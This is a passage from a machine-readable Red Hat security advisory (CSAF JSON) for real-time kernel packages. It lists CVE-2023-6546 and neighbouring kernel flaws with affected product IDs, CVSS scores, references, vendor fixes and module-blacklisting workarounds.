"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "workaround",
"details": "To mitigate this issue, it is possible to prevent the affected code from being loaded by blacklisting the vmwgfx kernel module. For instructions relating to blacklisting a kernel module, please see https://access.redhat.com/solutions/41278.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query"
},
{
"cve": "CVE-2023-6546",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-12-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2255498"
}
],
"notes": [
{
"category": "description",
"text": "A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: GSM multiplexing race condition leads to privilege escalation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is critical because it can be exploited to escalate privileges, directly threatening system security. Despite requiring local access and having a high attack complexity, the potential to severely impact confidentiality, integrity, and availability justifies its \"Important\" rating.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6546"
},
{
"category": "external",
"summary": "RHBZ#2255498",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6546"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6546",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6546"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3",
"url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3"
},
{
"category": "external",
"summary": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527"
}
],
"release_date": "2023-12-21T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-02T17:26:48+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by preventing the affected `n_gsm` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: GSM multiplexing race condition leads to privilege escalation"
},
{
"cve": "CVE-2023-6931",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
